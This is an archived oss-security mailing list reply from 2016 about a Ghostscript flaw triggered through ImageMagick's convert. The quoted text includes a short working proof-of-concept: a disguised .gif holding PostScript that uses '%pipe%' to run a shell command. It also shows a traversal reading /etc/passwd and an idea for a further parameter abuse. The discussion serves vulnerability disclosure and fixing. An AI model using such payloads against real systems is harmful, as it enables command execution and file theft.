Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <CAJ_zFkJnFQuTGgRzkPhAV1x+eBnh3r7sXSs=9OMNNVMDUDorRg@mail.gmail.com>
Date: Fri, 30 Sep 2016 15:58:25 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: Florian Weimer <fw@...eb.enyo.de>
Cc: oss-security@...ts.openwall.com
Subject: Re: ImageMagick identify "d:" hangs

On Fri, Sep 30, 2016 at 2:11 PM, Florian Weimer <fw@...eb.enyo.de> wrote:
> * Tavis Ormandy:
>>
>> $ cat test.gif
>> currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty)
>> .putdeviceparams
>> quit
>> $ convert test.gif png:test.png
>>
>> (Note: I don't know why it doesn't work on earlier versions, maybe
>> it's possible to make it work, or some other param will work)
>
> It still tries to open a file in earlier versions, with directory
> traversal:
>
> [pid 29607] open("/usr/share/ghostscript/9.06/iccprofiles/../../../../../etc/passwd", O_RDONLY) = 5
>
> The %pipe%-based execution was introduced as a side effect of:
>

Thanks Florian! I took a look where that directory comes from, I think
it pulls it from a userparam, like:

<< (ICCProfilesDir) (whatever) >> .setuserparams

That probably needs to be fixed. I wonder if there's a way to get that
directory to populate back into the PermitFileReading array?

Tavis.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.